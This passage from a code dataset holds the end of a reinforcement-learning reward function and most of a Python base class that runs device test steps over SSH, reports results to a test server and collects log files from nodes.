change... >\n # print(\"right direction\")\n total_reward += 2\n total_reward += (1*distance_after_move)\n #if object didnt move.. bad reward\n elif (abs(distance_after_move - distance_before_move) < 0.001):\n total_reward -= 15.0\n \n else:\n # print(\"wrong direction\")\n total_reward -= 2.0 # 1.0\n total_reward -= (1*distance_after_move*8) # 1.0\n \n \n # print(\"REWARD: \", distance_after_move )\n # Time punishment\n total_reward -= 1.0\n\n return total_reward","repo_name":"Deastan/envirenement_reinforcement_learning","sub_path":"environment_package/src/classes/pushing_reward.py","file_name":"pushing_reward.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41054902940","text":"import datetime\nimport json\nimport logging\nimport re\nimport sys\nimport threading\nimport time\nimport warnings\nfrom argparse import Namespace\nfrom collections.abc import Mapping\nfrom concurrent.futures import as_completed, ThreadPoolExecutor, TimeoutError\nfrom contextlib import contextmanager\nfrom distutils.util import strtobool\nfrom os import makedirs, path\nfrom pathlib import Path\nfrom tempfile import NamedTemporaryFile, TemporaryDirectory\nfrom typing import Any, cast, Dict, Generator, List, Optional, Sequence, Set, Tuple\n\nfrom ctf.common.connections.SSHConnection import SSHConnection\nfrom ctf.common.constants import (\n ActionTag as _ActionTag,\n TOTAL_LOGS_DIR_NAME,\n TOTAL_LOGS_FILE_NAME,\n)\nfrom ctf.common.enums import TagLevel as _TagLevel\nfrom ctf.common.logging_utils import log_call\n\n# To avoid lint warning of unused imports\nActionTag = _ActionTag\nTagLevel = _TagLevel\n\nfrom ctf.ctf_client.lib.connections_helper import (\n create_ssh_connection as _create_ssh_connection,\n get_ssh_connection_class as _get_ssh_connection_class,\n)\nfrom ctf.ctf_client.lib.constants import TestActionStatusEnum\nfrom ctf.ctf_client.server_gateway.api_gateway import get_ctf_api\n\n# To avoid lint warning of unused import\nget_ssh_connection_class = _get_ssh_connection_class\ncreate_ssh_connection = _create_ssh_connection\n\nfrom .exceptions import DeviceCmdError, DeviceConfigError, TestUsageError\n\nlogger = logging.getLogger(__name__)\n\n# Silence this warning, as some versions of paramiko will raise\n# ResourceWarnings when connections are opened/closed.\nwarnings.simplefilter(\"ignore\", ResourceWarning)\n\n\nclass ThreadLocal(threading.local):\n \"\"\"\n Thread local data for ctf logs and json data.\n\n Enables test step specific logging and json data creation from\n concurrent test steps.\n\n Any thread that calls log_to_ctf() or save_ctf_json_data()\n must explicitly initialize ThreadLocal on startup - see init().\n\n Thread specific attributes:\n step_idx: int # the 1-based index of the current test step\n\n References:\n https://docs.python.org/3/library/threading.html?highlight=local#thread-local-data\n https://github.com/python/cpython/blob/master/Lib/_threading_local.py\n\n Note:\n It is possible to keep ctf logs and json data in ThreadLocal.\n\n Pro: Eliminates the mutexes that protect the ctf log and the json data\n dictionaries.\n\n Con: Harder to maintain. Threads need to dispose of their logging data\n before exiting by returning it (or possibly pushing it to CTF). Thread-creators\n need to handle the logging data of their child threads.\n \"\"\"\n\n DEFAULT_INVALID_STEP_IDX: int = -1 # Valid step indecies are positive\n initialized = False # ThreadLocal has been explicitly initialized at least once.\n\n def init(self, step_idx: int):\n \"\"\"Initialize thread local data.\n\n Pooled threads must call `init()` explicitly on start up,\n because `__init__()` is only called automatically the first\n time a thread accesses ThreadLocal.\n \"\"\"\n self.step_idx = step_idx\n ThreadLocal.initialized = True\n\n @log_call(params=False, returned=False, result=False)\n def clear(self):\n ThreadLocal.initialized = False\n\n def __init__(self, step_idx: Optional[int] = None):\n \"\"\"Initialize the thread specific dictionary\n\n Invoked automatically once per thread the first time it accesses ThreadLocal.\n \"\"\"\n\n if step_idx:\n self.step_idx = step_idx\n ThreadLocal.initialized = True\n else:\n self.step_idx = self.DEFAULT_INVALID_STEP_IDX\n\n\nclass BaseCtfTest:\n \"\"\"Base class for CTF tests.\n\n Encapsulates a typical test sequence using the CTF API.\n \"\"\"\n\n # Name of the test\n TEST_NAME: str = \"\"\n # Description of the test\n DESCRIPTION: str = \"\"\n\n # Template string holding default node data filename for this test (used\n # when not passed in as a CLI argument).\n #\n # Variable substitutions:\n # - SETUP_ID => self.test_setup_id\n NODES_DATA_FORMAT: str = \"\"\n\n # If `self.NODES_DATA_FORMAT` is set, is it optional?\n NODES_DATA_OPTIONAL: bool = False\n\n def __init__(self, args: Namespace) -> None:\n #### Task execution ####\n # Number of thread pool workers\n self.max_workers: int = int(args.max_workers)\n # Thread pool for submitting concurrent tasks *within* a test step\n # (e.g. to execute commands on multiple test devices simultaneously)\n self.thread_pool = ThreadPoolExecutor(\n thread_name_prefix=\"NodeWorkers\", max_workers=self.max_workers\n )\n\n # CTF run mode flag. Running in serverless mode or CTF server APIs\n self.serverless = (\n False if not args.serverless else bool(strtobool(args.serverless))\n )\n logger.info(f\"Running in serverless mode = {self.serverless}\")\n\n # Run with or without ctf server\n self.ctf_api = get_ctf_api(serverless=self.serverless) #\n\n # Configure serverless variables\n if self.serverless:\n self.ctf_api.set_serverless_config()\n\n # Default timeout period to use for each test step (in seconds)\n self.timeout: int = args.timeout\n # Default timeout period for the log file collection step (in seconds)\n self.log_collect_timeout: int = args.log_collect_timeout\n # Default timeout period to use for scp commands (in seconds)\n self.scp_timeout: int = args.scp_timeout\n # Steps to skip\n self.skip_steps: Sequence[str] = args.skip or [] if \"skip\" in args else []\n # Enable verbose ssh debug logs\n self.ssh_debug: bool = args.debug and (not args.no_ssh_debug)\n # test case config json overlay/update from the CTF UI\n self.json_args: str = args.json_args\n # Logs will be stored locally (default /tmp/ctf_logs/) in addition to CTF server. User will manage the local logs.\n self.store_logs_locally = args.store_logs_locally\n\n # Parse test-specific arguments (K=V pairs) into a Dict\n self.test_args: Dict[str, Any] = self._build_test_args(\n args.test_args if \"test_args\" in args else {}\n )\n logger.debug(f\"Using test arguments: {self.test_args}\")\n\n # Is this test run via Sandcastle (Facebook CI)?\n self.run_sandcastle: bool = args.run_sandcastle\n\n #### CTF-specific ####\n # CTF team ID\n self.team_id: int = args.team_id\n # CTF test setup ID\n self.test_setup_id: int = int(args.test_setup_id)\n # Have we acquired/reserved this test setup?\n self.setup_reserved: bool = False\n # This instance's CTF test execution ID (a.k.a. test run ID)\n self.test_exe_id: int = 0\n # Start time of the test\n self.test_start_time = int(time.time())\n # Test device information, initialized during `self.init_test_run()`\n self.device_info: Dict = {}\n\n # Map from test step index to a list of log lines\n self.ctf_logs: Dict[int, List[str]] = {}\n # Lock for thread safe logging\n # Protects: ctf_logs\n self.ctf_log_lock = threading.Lock()\n\n # Map from test step index to json data to visualize\n self.ctf_json_data: Dict[int, Dict] = {}\n # Lock for thread safe json data update\n # Protects: ctf_json_data\n self.ctf_json_data_lock = threading.Lock()\n\n # Map from test step index to keyed json object test action result objects\n self.ctf_keyed_json_objects: Dict[int, List[Dict]] = {}\n\n # Lock for thread safe keyed json objects update\n # Protects: ctf_keyed_json_objects\n self.ctf_keyed_json_objects_lock = threading.Lock()\n\n # Lock for thread safe data push to CTF\n # Protects\n # save_test_action_result()\n # save_test_action_result_json_data()\n self.ctf_push_lock = threading.Lock()\n\n # Thread-local data. See ThreadLocal for details.\n self.thread_local = ThreadLocal()\n\n # Logs to collect from nodes of each particular device type after each test run\n self.logfiles: Dict[str, List[str]] = {}\n\n # Safe tempdir which is available in all test steps\n # Initialized in run_test()\n self.tempdir = None\n\n # Node data for this test, holding a combination of setup-specific and\n # test-specific configuration.\n #\n # This is a map of integer node IDs (matching `self.device_info` from\n # the CTF database) to configuration objects.\n #\n # Validate some basic things early in this constructor since\n # self.nodes_data isn't loaded until after CTF test data is initialized.\n self.nodes_data: Dict = {}\n self.nodes_data_file: str = \"\"\n if args.nodes_data:\n self.nodes_data_file = args.nodes_data\n elif args.nodes_data_dir and self.NODES_DATA_FORMAT:\n f = self.NODES_DATA_FORMAT.format(SETUP_ID=self.test_setup_id)\n self.nodes_data_file = path.join(args.nodes_data_dir, f)\n if (\n not self.nodes_data_file\n and self.NODES_DATA_FORMAT\n and not self.NODES_DATA_OPTIONAL\n ):\n f = self.NODES_DATA_FORMAT.format(SETUP_ID=self.test_setup_id)\n raise TestUsageError(f\"Required node data file is missing: {f}\")\n if self.nodes_data_file and not path.isfile(self.nodes_data_file):\n err = f\"Node data file not found: {self.nodes_data_file}\"\n if self.NODES_DATA_OPTIONAL:\n logger.warning(err)\n self.nodes_data_file = \"\"\n else:\n raise FileNotFoundError(err)\n\n def cleanupThreadPool(self, pool: ThreadPoolExecutor) -> None:\n if pool:\n # error: \"ThreadPoolExecutor\" has no attribute \"_threads\"\n for pool_thread in pool._threads:\n try:\n # pyre-fixme[16]: `Thread` has no attribute `_tstate_lock`.\n if pool_thread._tstate_lock:\n pool_thread._tstate_lock.release()\n except Exception as e:\n logger.debug(f\"Problem with releasing a thread: {e}\")\n pass\n pool.shutdown(wait=False)\n\n def __del__(self) -> None:\n self.cleanupThreadPool(self.thread_pool)\n\n @staticmethod\n def test_params() -> Dict[str, Dict]:\n \"\"\"Return any test-specific parameter definitions.\n\n This is a map of parameter names to object values as follows:\n ```\n {\n \"desc\": \"\",\n \"required\": ,\n \"default\": ,\n \"convert\": \n }\n ```\n \"\"\"\n return {}\n\n def _build_test_args(self, args: Dict) -> Dict[str, Any]:\n \"\"\"Build a map of test-specific arguments.\"\"\"\n test_args: Dict[str, Any] = {}\n test_params: Dict[str, Dict] = self.test_params()\n\n # Parse CLI args\n for arg in args:\n k, v = arg.split(\"=\")\n if k not in test_params:\n raise TestUsageError(f\"Unknown test argument '{k}'\")\n test_args[k] = v\n\n # Process test param definitions\n for k, v in test_params.items():\n if k in test_args:\n if \"convert\" in v:\n test_args[k] = v[\"convert\"](test_args[k])\n else:\n if \"required\" in v and v[\"required\"]:\n raise TestUsageError(f\"Missing required test argument '{k}'\")\n test_args[k] = v[\"default\"] if \"default\" in v else None\n\n return test_args\n\n def execute(self, acquire: bool = True) -> int:\n \"\"\"Execute the test.\n\n Return zero upon success, or a non-zero value upon failure.\n \"\"\"\n with self._test_manager():\n test_methods = [self.init_test_run, self.run_test]\n if acquire:\n # pyre-fixme[6]: Expected `Union[BoundMethod[typing.Callable(BaseCtfTest....\n test_methods.insert(0, self.acquire_test_setup)\n for method in test_methods:\n # pyre-fixme[16]: Callable `init_test_run` has no attribute `__name__`.\n logger.debug(f\"[[ Running method: '{method.__name__}' ]]\")\n error = method()\n if error:\n return int(error)\n\n return 0\n\n def _run_test(self) -> int:\n \"\"\"Run all test steps, e.g. run_test_steps() surrounded by pre_run()\n and post_run(), among other functions.\n \"\"\"\n steps = [\n {\n \"name\": \"[ Test info ]\",\n \"function\": self.log_test_info,\n \"function_args\": (),\n \"success_msg\": \"\",\n },\n (\n {\n \"name\": \"[ Pre-run ]\",\n \"function\": lambda *a, **k: None,\n \"function_args\": (),\n \"success_msg\": \"Pre-run was skipped\",\n }\n if \"pre_run\" in self.skip_steps\n else {\n \"name\": \"[ Pre-run ]\",\n \"function\": self.pre_run,\n \"function_args\": (),\n \"success_msg\": \"Pre-run finished\",\n }\n ),\n *self.get_test_steps(),\n (\n {\n \"name\": \"[ Post-run ]\",\n \"function\": lambda *a, **k: None,\n \"function_args\": (),\n \"success_msg\": \"Post-run was skipped\",\n }\n if \"post_run\" in self.skip_steps\n else {\n \"name\": \"[ Post-run ]\",\n \"function\": self.post_run,\n \"function_args\": (),\n \"success_msg\": \"Post-run finished\",\n \"continue_on_failure\": True,\n }\n ),\n {\n \"name\": \"[ Collect logs ]\",\n \"function\": self._collect_logfiles_wrapper,\n \"function_args\": (),\n \"success_msg\": \"Log collection finished\",\n \"continue_on_failure\": True,\n \"never_fail\": True,\n },\n ]\n post_run_idx = len(steps) - 2 # post_run(), collect_logfiles()\n ret: int = self.run_test_steps(steps, post_run_idx)\n self.finish_test_run(ret)\n return ret\n\n def run_test(self) -> int:\n \"\"\"Run all test steps with a default temporary directory\"\"\"\n ret = 1\n with TemporaryDirectory(prefix=\"ctf_\") as tmpdir:\n self.tempdir = tmpdir\n ret = self._run_test()\n return ret\n\n def log_test_info(self) -> None:\n \"\"\"Log some information specific to this test run to CTF.\"\"\"\n device_list = []\n for device_id, device in self.device_info.items():\n device_list.append(\n f\"[{device_id}] {device.connection.ip_address.lower()} \"\n + f\"({device.device_type().capitalize()})\"\n )\n devices = \"\\n\".join(device_list)\n\n self.log_to_ctf(f\"Test command:\\n{' '.join(sys.argv)}\")\n self.log_to_ctf(f\"Devices:\\n{devices}\")\n\n def pre_run(self) -> None:\n \"\"\"Function to run before all test steps.\"\"\"\n pass\n\n def post_run(self) -> None:\n \"\"\"Function to run after all test steps.\"\"\"\n pass\n\n def acquire_test_setup(self, wait_time: float = 30.0) -> int:\n \"\"\"Acquire the test setup, busy-waiting if unavailable.\"\"\"\n # TODO: This polling should move to CTF itself - we should join a queue\n done = False\n while not done:\n try:\n done = self.ctf_api.set_test_setup_and_devices_busy(self.test_setup_id)\n except Exception as e:\n logger.info(\n f\"acquire_test_setup | ignoring {str(e)} raised by set_test_setup_and_devices_busy\"\n )\n if not done:\n logger.info(\n f\"Test Setup {self.test_setup_id} is not available. \"\n + f\" Sleeping {wait_time}s\"\n )\n time.sleep(wait_time)\n continue\n\n self.setup_reserved = True\n logger.debug(f\"Acquired test setup {self.test_setup_id}\")\n return 0\n\n def free_test_setup(self) -> None:\n \"\"\"Release the test setup.\"\"\"\n if self.setup_reserved:\n self.ctf_api.set_test_setup_and_devices_free(self.test_setup_id)\n self.setup_reserved = False\n\n def resource_cleanup(self) -> None:\n \"\"\"Test resource cleanup\"\"\"\n # Free the test setup if needed\n if self.setup_reserved:\n self.free_test_setup()\n\n def init_test_run(self) -> int:\n \"\"\"Set up the CTF run.\n\n Returns a non-zero integer upon error.\n \"\"\"\n # Get the configuration\n self.device_info = self.ctf_api.get_test_setup_devices_and_connections(\n test_setup_id=self.test_setup_id,\n )\n if not self.device_info:\n logger.error(\n f\"Unable to get device info for test setup {self.test_setup_id}\"\n )\n return 10\n logger.debug(f\"device_info: {self.device_info}\")\n\n # Set ssh logging verbosity and disable sftp\n for device in self.device_info.values():\n if isinstance(device.connection, SSHConnection):\n device.connection.enable_verbose_logs(self.ssh_debug)\n device.connection.enable_sftp(False)\n\n self.test_start_time = int(time.time())\n result = self.ctf_api.create_test_run_result(\n name=self.TEST_NAME,\n identifier=str(int(time.time())),\n description=self.DESCRIPTION,\n team_id=self.team_id,\n test_setup=self.test_setup_id,\n )\n logger.debug(f\"Got test run result: '{result}'\")\n test_exe_details = result.get(\"data\")\n if not test_exe_details:\n logger.error(f\"Did not receive test run data: '{test_exe_details}'\")\n return 11\n\n self.test_exe_id = test_exe_details.get(\"id\")\n if not self.test_exe_id:\n logger.error(f\"Unable to get test_exe_id: {self.test_exe_id}\")\n return 12\n\n self.post_test_init()\n\n return 0\n\n def post_test_init(self) -> None:\n \"\"\"Function called after init_test_run(), when all test data should be\n initialized.\n \"\"\"\n self.nodes_data = self._load_nodes_data(self.nodes_data_file)\n\n def get_test_steps(self) -> List[Dict]:\n \"\"\"Return a list of test steps to be executed in run_test_steps().\n\n Each step must be an object with the following structure:\n ```\n {\n \"name\": \"\",\n \"function\": ,\n \"function_args\": (),\n \"success_msg\": \"\",\n \"concurrent\": ,\n \"delay\": ,\n \"post_delay\": ,\n \"error_handler\": [\n {\n \"function\": ,\n \"function_args\": (),\n }\n ],\n \"continue_on_failure\": ,\n \"negate_result\": ,\n \"never_fail\": \n }\n ```\n \"\"\"\n return []\n\n def get_meta_data_for_step(self, step: Dict) -> List[Dict]:\n \"\"\"\n Use this to get ActionTags and logfiles which needs to be recorded with step.\n Returns data in below format which includes\n 1. list of error tags (referred as action tags in CTF) which will be hooked to action.\n 2. List of log files for each node_id which will be saved under CTF action\n 3. Function to call for cleanup of logs after logs are pulled\n 4. Args for the above function\n {\n \"tags\": List[ActionTag],\n \"logs\": Dict[int, List],\n \"logs_cleanup_fn\": ,\n \"logs_cleanup_fn_args\": ()\n }\n \"\"\"\n return []\n\n def _run_test_step(self, step: Dict, step_idx) -> int:\n \"\"\"Run one test step and report result to CTF.\n\n Note: `step_idx` is 1-based\n Returns 0 on success, `step_idx` otherwise\n \"\"\"\n\n # We are in a new thread. Publish step_idx in thread local data.\n self.thread_local.init(step_idx)\n\n step_start = datetime.datetime.now()\n logger.info(f\"[Step {step_idx}] {step['name']}\")\n step[\"start_time\"] = datetime.datetime.utcnow()\n\n # Delay\n delay_sec = step.get(\"delay\", 0)\n if delay_sec > 0:\n self.log_to_ctf(\n f\"Delaying step {step_idx} {step['name']} for {delay_sec} s\"\n )\n time.sleep(delay_sec)\n\n # Run the test step\n step_outcome: int = 0 # 0=success, otherwise failed step_idx\n try:\n step[\"function\"](*step[\"function_args\"])\n if step[\"success_msg\"]:\n self.log_to_ctf(step[\"success_msg\"], \"info\")\n except Exception as e:\n step_outcome = step_idx\n err_msg = f\"Failed to run step [{step['name']}]: {e} ({type(e)})\"\n logger.exception(err_msg)\n self.log_to_ctf(err_msg, \"error\")\n\n # Negate step result\n if step.get(\"negate_result\", False):\n if step_outcome == 0:\n step_outcome = step_idx\n else:\n step_outcome = 0\n self.log_to_ctf(\n f\"Test step {step_idx} result negated to {step_outcome}\", \"info\"\n )\n\n # Find the test action outcome code for CTF\n never_fail: bool = step.get(\"never_fail\", False)\n if step_outcome == 0:\n reported_outcome = TestActionStatusEnum.SUCCESS\n elif never_fail:\n reported_outcome = TestActionStatusEnum.WARNING\n else:\n reported_outcome = TestActionStatusEnum.FAILURE\n\n # Post Delay\n post_delay_sec = step.get(\"post_delay\", 0)\n if post_delay_sec > 0 and (\n step.get(\"continue_on_failure\", False) or never_fail or step_outcome == 0\n ):\n self.log_to_ctf(\n f\"Waiting for {post_delay_sec}s after executing step {step_idx} {step['name']}\"\n )\n time.sleep(post_delay_sec)\n\n # Get log files and tags for this step\n step_meta_data = self.get_meta_data_for_step(step=step)\n\n # Filter tags and log files from the step_meta_data\n error_tags = []\n log_files: Dict[int, List] = {}\n for meta_data in step_meta_data:\n error_tags.extend(meta_data.get(\"tags\", []))\n if \"logs\" in meta_data:\n self.merge_dict_of_lists(log_files, meta_data[\"logs\"])\n\n # Get the CTF logs for the current step.\n with self.ctf_log_lock:\n ctf_logs = self.ctf_logs.get(step_idx, [])\n\n # Save the action result\n # TODO: Return `action_result` to avoid ctf_push_lock\n with self.ctf_push_lock:\n action_result = self.ctf_api.save_test_action_result(\n test_run_id=self.test_exe_id,\n description=step[\"name\"],\n outcome=reported_outcome,\n logs=\"\\n\".join(ctf_logs),\n start_time=step_start,\n end_time=datetime.datetime.now(),\n step_idx=step_idx,\n tags=error_tags,\n )\n logger.debug(f\"Recorded test action result: {action_result}\")\n\n test_action_result_id = action_result[\"data\"][\"test_action_result_id\"]\n\n # Get the CTF json data\n with self.ctf_json_data_lock:\n ctf_json_data = self.ctf_json_data.get(step_idx, {})\n\n # Save CTF Json Data\n if len(ctf_json_data) > 0:\n with self.ctf_push_lock:\n save_json_data_result = self.ctf_api.save_test_action_result_json_data(\n test_action_result_id=test_action_result_id,\n ctf_json_data_all=json.dumps(ctf_json_data),\n )\n logger.debug(f\"Recorded CTF JSON data: {save_json_data_result}\")\n\n # Get the Test Action Result with key\n with self.ctf_keyed_json_objects_lock:\n ctf_keyed_json_objects = self.ctf_keyed_json_objects.get(step_idx, {})\n\n # Save Test Action Result Key Json Objects\n if len(ctf_keyed_json_objects) > 0:\n with self.ctf_push_lock:\n for test_action_result_key in ctf_keyed_json_objects:\n save_test_action_result_keyed_json = (\n self.ctf_api.save_test_action_result_keyed_json_object(\n self.test_exe_id,\n test_action_result_id,\n test_action_result_key[\"key\"],\n test_action_result_key[\"json_object\"],\n team_id=self.team_id,\n )\n )\n logger.debug(\n f\"Recorded CTF Test Action Result key JSON: {save_test_action_result_keyed_json}\"\n )\n\n # Pull the log files from node and push to CTF\n self.collect_logfiles_for_action(log_files, test_action_result_id)\n # Use this method to do any post processing\n self.secondary_step_action(test_action_result_id, step)\n\n # Run the logs_cleanup_fn\n for meta_data in step_meta_data:\n try:\n if \"logs_cleanup_fn\" in meta_data:\n meta_data[\"logs_cleanup_fn\"](*meta_data[\"logs_cleanup_fn_args\"])\n except Exception as e:\n err_msg = f\"Failed to handle logs_cleanup_fn [{step['name']}]: {e} ({type(e)})\"\n logger.exception(err_msg)\n self.log_to_ctf(err_msg, \"error\")\n\n ret_val: int = step_outcome\n if never_fail:\n ret_val = 0\n logger.debug(\n f'step:{step[\"name\"]} never_fail:{never_fail} step_outcome:{step_outcome} return:{ret_val}'\n )\n return ret_val\n\n def secondary_step_action(self, test_action_result_id: int, step: Dict) -> None:\n \"\"\"Use this method to do any post processing after the step result is saved on CTF\"\"\"\n return\n\n def _get_max_concurrent_steps(self, steps: List[Dict]) -> int:\n \"\"\"Get the max number of concurrent thread steps\"\"\"\n max_concurrent: int = 1\n concurrent: int = 0\n idx: int = 0\n while idx < len(steps):\n if \"concurrent\" in steps[idx]:\n concurrent = concurrent + 1\n else:\n max_concurrent = max(concurrent, max_concurrent)\n concurrent = 0\n idx = idx + 1\n logger.debug(f\"Max number of concurrent test steps = {max_concurrent}\")\n return max_concurrent\n\n def run_test_steps(\n self, steps: List[Dict], post_run_idx: Optional[int] = None\n ) -> int:\n \"\"\"Run a list of test steps and report each result to CTF.\n\n See get_test_steps() for the expected data format.\n\n If any step fails, this will abort and return with the step number\n (1-indexed) that failed. Otherwise, this returns 0 upon success.\n\n If `post_run_idx` is provided, steps starting at this index (0-based)\n will always be run.\n \"\"\"\n\n logger.info(f\"**** Starting test: '{self.TEST_NAME} - {self.DESCRIPTION}' ****\")\n\n # Create a thread pool for the concurrent test-steps\n max_step_workers: int = self._get_max_concurrent_steps(steps)\n step_thread_pool = ThreadPoolExecutor(\n thread_name_prefix=\"TestStepWorkers\", max_workers=max_step_workers\n )\n\n idx: int = 0 # 0-based index into \"steps\"\n test_outcome: int = 0 # 0=success, otherwise (index of first failed step + 1)\n futures: Dict = {}\n while idx < len(steps):\n # Run the next concurrent test-step group\n futures.clear()\n done: bool = False\n while not done:\n futures[\n step_thread_pool.submit(\n self._run_test_step, step=steps[idx], step_idx=idx + 1\n )\n ] = idx\n if (\n steps[idx].get(\"concurrent\", False)\n and (idx + 1) < len(steps)\n and steps[idx + 1].get(\"concurrent\", False)\n ):\n idx = idx + 1\n else:\n done = True\n\n # Wait for completion of the futures in the test-step group\n first_failed_idx: int = -1\n error_handler_idx: int = -1\n group_continue_on_failure: bool = True\n\n for future in as_completed(futures.keys()):\n result = future.result()\n completed_idx = futures[future]\n if result != 0:\n if first_failed_idx == -1:\n first_failed_idx = completed_idx\n test_outcome = first_failed_idx + 1\n step = steps[completed_idx]\n if (\n error_handler_idx == -1\n and \"error_handler\" in step\n and len(step[\"error_handler\"]) > 0\n ):\n # First failed step in the concurrent group with an error_handler\n error_handler_idx = completed_idx\n if not steps[completed_idx].get(\"continue_on_failure\", False):\n group_continue_on_failure = False\n\n # Insert an error handler and skip the the rest of the steps when\n # (1) Any step from the concurrent group has failed --AND--\n # (2) continue_on_failure is false for *any* failed step in the group --AND--\n # (3) The concurrent \"group\" was not the post_run\n # The inserted error handler is the first failed test from the\n # concurrent group that has an error handler.\n if (\n first_failed_idx >= 0\n and not group_continue_on_failure\n and post_run_idx is not None\n and idx < post_run_idx\n ):\n idx = post_run_idx - 1\n if error_handler_idx >= 0:\n step = steps[error_handler_idx]\n logger.info(\n f\"**** Inserting error handler for failed step {error_handler_idx+1} ****\"\n )\n steps.insert(\n post_run_idx,\n {\n \"name\": \"[ Error handler ]\",\n \"function\": self._run_error_handler,\n \"function_args\": (step[\"error_handler\"],),\n \"success_msg\": \"Error handler finished.\",\n },\n )\n\n idx = idx + 1\n\n self.cleanupThreadPool(step_thread_pool)\n\n return test_outcome\n\n def _run_error_handler(self, error_handler: List[Dict]) -> None:\n \"\"\"Run all functions in the given error handler sequentially.\"\"\"\n for obj in error_handler:\n obj[\"function\"](*obj[\"function_args\"])\n\n def get_dashboard_links(self) -> List[Dict]:\n \"\"\"Return list of dashboard links which will be hooked to test run result\n Dashboard links will be used to show on TestRunResult page.\n\n CTF accepts dashboard details in below format:\n [{\"label\":\"Grafana\" ,\"link\":\"http://grafana/dashboard\"}]\n \"\"\"\n return []\n\n def finish_test_run(self, test_outcome: int) -> int:\n \"\"\"Mark the CTF test run as finished.\"\"\"\n test_status = \"Test PASSED\"\n # test_outcome is 0 for pass else it is the failed step id\n if test_outcome != 0:\n test_status = f\"Test FAILED at step {test_outcome}\"\n logger.info(f\"*** {test_status} ***\")\n\n dashboard_details = self.get_dashboard_links()\n test_result = self.ctf_api.save_test_run_outcome(\n test_run_id=self.test_exe_id,\n dashboard_details=dashboard_details,\n test_status=test_outcome,\n )\n logger.info(f\"**** {test_result['message']}! ****\")\n test_url = self.test_url()\n if not self.serverless:\n logger.info(f\"Test ID {self.test_exe_id} finished: {test_url}\")\n if self.run_sandcastle and not self.serverless:\n pass_fail_symbol = \"\\u2705\" if test_outcome == 0 else \"\\u274e\"\n label = f\"CTF {self.test_exe_id} {pass_fail_symbol}\"\n logger.info(f\"SANDCASTLE|addLink|{label}|{test_url}\")\n\n # Disconnect from all devices\n for device in self.device_info.values():\n device.connection.disconnect() # TODO Introduce disconnectAllThreads()\n\n return 0\n\n def test_url(self) -> str:\n \"\"\"Return a URL to access test results (after `self.init_test_run()`).\"\"\"\n # TODO replace this when added to CTF API\n if self.test_exe_id:\n return f\"https://internalfb.com/intern/bunny/?q=ctf+{self.test_exe_id}\"\n else:\n return \"\"\n\n def _collect_logfiles_wrapper(self) -> None:\n \"\"\"Call `collect_logfiles()` with `self.logfiles`.\"\"\"\n # needed to allow subclasses to modify self.logfiles\n self.collect_logfiles(self.logfiles)\n\n def collect_logfiles(self, logfiles: Dict[str, List[str]]) -> None:\n \"\"\"Collect any requested log files from the test devices and submit\n them to CTF.\n \"\"\"\n if not logfiles:\n self.log_to_ctf(\"No log files to collect.\", \"info\")\n return\n\n self.log_to_ctf(f\"Collecting log files: [{logfiles}]\", \"info\")\n\n futures: Dict = {}\n for node_id, device in self.device_info.items():\n if device.device_type() in logfiles and logfiles[device.device_type()]:\n futures[\n self.thread_pool.submit(\n self._fetch_and_submit_logfiles,\n node_id,\n device.connection,\n logfiles[device.device_type()],\n self.thread_local.step_idx,\n )\n ] = node_id\n\n failed_nodes = []\n for future in as_completed(futures.keys(), timeout=self.log_collect_timeout):\n result = future.result()\n node_id = futures[future]\n if result:\n self.log_to_ctf(\n f\"Node {node_id} finished fetching and pushing log files\"\n )\n else:\n failed_nodes.append(node_id)\n self.log_to_ctf(\n f\"Failed to collect log files from node {node_id}\", \"error\"\n )\n\n if failed_nodes:\n raise DeviceCmdError(\n f\"Errors were raised during log collection on {len(failed_nodes)} \"\n + f\"node(s): {sorted(failed_nodes)}\"\n )\n\n def collect_logfiles_for_action(\n self,\n logfiles: Dict[int, List[str]],\n test_action_result_id: int,\n ) -> None:\n \"\"\"Collect any requested log files from the test devices and submit\n them to CTF action log.\n \"\"\"\n if not logfiles:\n self.log_to_ctf(\n f\"No log files to collect for action {test_action_result_id}\", \"info\"\n )\n return\n\n if not test_action_result_id:\n raise TestUsageError(\"Missing Action result id\")\n\n self.log_to_ctf(\n f\"Collecting log files for action {test_action_result_id}: [{logfiles}]\",\n \"info\",\n )\n\n futures: Dict = {}\n for node_id, device in self.device_info.items():\n if logfiles.get(node_id, None):\n futures[\n self.thread_pool.submit(\n self._fetch_and_submit_logfiles,\n node_id,\n device.connection,\n logfiles[node_id],\n self.thread_local.step_idx,\n test_action_result_id,\n )\n ] = node_id\n\n failed_nodes = []\n for future in as_completed(futures.keys(), timeout=self.log_collect_timeout):\n result = future.result()\n node_id = futures[future]\n if result:\n self.log_to_ctf(\n f\"Node {node_id} finished fetching and pushing log files\"\n )\n else:\n failed_nodes.append(node_id)\n self.log_to_ctf(\n f\"Failed to collect log files from node {node_id}\", \"error\"\n )\n\n if failed_nodes:\n raise DeviceCmdError(\n f\"Errors were raised during log collection on {len(failed_nodes)} \"\n + f\"node(s): {sorted(failed_nodes)}\"\n )\n\n def _fetch_and_submit_logfiles(\n self,\n node_id: int,\n connection: SSHConnection,\n logfiles: Tuple[str, ...],\n step_idx: Optional[int] = None,\n test_action_result_id: Optional[int] = None,\n ) -> bool:\n \"\"\"Collect the requested log files and submit them to CTF.\n If test_action_result_id is mentioned save logs against given action else\n save logs for test run\"\"\"\n\n if step_idx:\n # We are in a new thread. Publish step_idx in thread local data.\n # See also: ThreadLocal\n self.thread_local.init(step_idx)\n\n try:\n connection.connect()\n except Exception as e:\n self.log_to_ctf(\n f\"Connection failed to {connection.ip_address}: {str(e)}\", \"error\"\n )\n raise\n\n result: Dict = {}\n success: bool = True\n if self.store_logs_locally:\n local_dir = path.join(\n self.store_logs_locally, str(self.test_exe_id), str(node_id)\n )\n makedirs(local_dir, exist_ok=True)\n else:\n tmp_dir = TemporaryDirectory(prefix=\"logfiles-\")\n local_dir = tmp_dir.name\n\n for logfile in logfiles:\n # Fetch log file from test device\n self.log_to_ctf(f\"Fetching {logfile} to local dir: {local_dir}\")\n if not self.fetch_file(connection, local_dir, logfile, recursive=True):\n success = False\n # attempt to reconnect and try to fetch the next file\n try:\n connection.connect()\n except Exception as e:\n self.log_to_ctf(\n f\"Connection failed to {connection.ip_address}: {str(e)}\",\n \"error\",\n )\n continue\n\n # Push to CTF\n local_path = Path(f\"{local_dir}/{Path(logfile).name}\")\n # use step to form log destination path\n step = f\"step_{step_idx}_\" if step_idx else \"\"\n if local_path.is_dir():\n dest_path = (\n f\"{node_id}/{step}{test_action_result_id}{logfile}\"\n if test_action_result_id\n else 